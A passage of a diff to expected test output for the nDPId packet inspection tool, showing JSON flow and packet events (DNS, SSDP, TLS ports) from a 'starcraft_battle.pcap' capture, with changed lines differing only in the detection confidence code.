{"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437389954543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2EAAIARVpHAqAFkwKgB\/uXPADUANAhuNT0BAAABAAAAAAAAAjI2AzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAE="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437389954544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954544,"pkt":"IImEa8W6hCYVPnXECABFAABIAABAAEARtfLAqAH+wKgBZAA15c8ANGxA5FmBgwABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389954543,"flow_last_seen":1437389954544,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954544,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389954714,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"26.186.239.80.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389955642,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389955642,"pkt":"IImEa8W6hCYVPnXECABFAAAo31oAAPMGG1FQ77oowKgBZAG7DZa8aq6WRaVMa1AU+bLclgAAAAAAAAAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955670,"flow_last_seen":1437389955670,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1437389955670,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -29,19 +29,19 @@ 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1437389955696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1437389955696,"pkt":"hCYVPnXEIImEa8W6CABFAABFDD0AAIARlobAqAFkrcIoFtFAAbsAMXj5DBnPzxTN69maKsxX+B31W\/+0ERxkBS+pEu\/Lu7MhCuhfcS4mTXYS47w="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1437389955747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389955747,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2IAAIARVpDAqAFkwKgB\/uXcADUANLhfizwBAAABAAAAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955747,"flow_last_seen":1437389955747,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389955747,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1437389955800,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1437389955800,"pkt":"IImEa8W6hCYVPnXECABFAABuAABAAEARtczAqAH+wKgBZAA15dwAWs2+izyBgAABAAEAAAAAAjQwAzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAC+XABoNODAtMjM5LTE4Ni00MAZhdHRlbnMDbmV0AA=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389955800,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"40.186.239.80.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955932,"flow_last_seen":1437389955932,"flow_idle_time":7580000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":1,"thread_ts_msec":1437389955932,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1437389955932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1437389955932,"pkt":"hCYVPnXEIImEa8W6CABFAAApUQNAAIAGOxbAqAFk2DrUbgvsAbu4rIxVQhQWM1AQAPyVMQAAAA=="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1437389955967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389955967,"pkt":"IImEa8W6hCYVPnXECABFAAA0zAIAADUGSwzYOtRuwKgBZAG7C+xCFBYzuKyMVoAQAofTiQAAAQEFCrisjFW4rIxW"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1437389956550,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2MAAIARVo\/AqAFkwKgB\/uXjADUANNVsy9IBAAABAAAAAAAAAjIyAjQwAzE5NAMxNzMHaW4tYWRkcgRhcnBhAAAMAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"22.40.194.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1437389956550,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1437389956550,"pkt":"hCYVPnXEIImEa8W6CABFAABJX2QAAIARVo3AqAFkwKgB\/uXjADUANaawlcQBAAABAAAAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAAB"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389956550,"flow_last_seen":1437389956550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389956550,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1437389956552,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1437389956552,"pkt":"IImEa8W6hCYVPnXECABFAACPAABAAEARtavAqAH+wKgBZAA15eMAe9\/glcSBgAABAAIAAAAAAzExMAMyMTICNTgDMjE2B2luLWFkZHIEYXJwYQAADAABwAwADAABAABT2QAcEG1pbDAxczI1LWluLWYxMTAFMWUxMDADbmV0AMAMAAwAAQAAU9kAEg9taWwwMXMyNS1pbi1mMTTASg=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389956550,"flow_last_seen":1437389956552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1437389956552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"110.212.58.216.in-addr.arpa","num_queries":1,"num_answers":2,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389958129,"flow_last_seen":1437389958129,"flow_idle_time":7580000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1437389958129,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1437389958129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1437389958129,"pkt":"hCYVPnXEIImEa8W6CABFAAA3SKVAAIAGzl7AqAFkUO\/QwQ1jBF+OUzht5cVUn1AY+ehDuQAA00l1ne7IFusS1wyd32Yu"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1437389958226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389958226,"pkt":"IImEa8W6hCYVPnXECABFAAAoVBZAADQGDv1Q79DBwKgBZARfDWPlxVSfjlM4fFAQPaJ7fgAAAAAAAAAA"} @@ -52,7 +52,7 @@ 00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"starcraft_battle.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":35020,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1437389961598,"pkt":"AYDCAAAOIImEa8W6iMwCBwQgiYRrxboEBwMgiYRrxboGAg4R\/gkAEg8BAwABAAD+BwASuwEAAQEAAA=="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":200000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1437389963466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":423,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":423,"pkt_l4_len":389,"thread_ts_msec":1437389963466,"pkt":"AQBef\/\/6hCYVPnXECABFAAGZAABAAAERxbPAqAH+7\/\/\/+pbNB2wBhW9zTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTYwDQpsT0NBVElPTjogaHR0cDovLzE5Mi4xNjguMS4yNTQ6NTcwNTIvcm9vdERlc2MwLnhtbA0KU0VSVkVSOiBFUElDRU5UUk8gVVBuUC8xLjAgTWluaVVQblBkLzEuNg0KTlQ6IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpVU046IHV1aWQ6MTEyNjY3MzYtZmE1OS0xMWU0LTljOWYtODQyNjE1M2U3NWM0DQpOVFM6IHNzZHA6YWxpdmUNCk9QVDogImh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7DQowMS1OTFM6IDENCkJPT1RJRC5VUE5QLk9SRzogMQ0KQ09ORklHSUQuVVBOUC5PUkc6IDEzMzcNCg0K"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":200000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389963466,"flow_last_seen":1437389963466,"flow_idle_time":200000,"flow_min_l4_payload_len":381,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1437389963466,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": 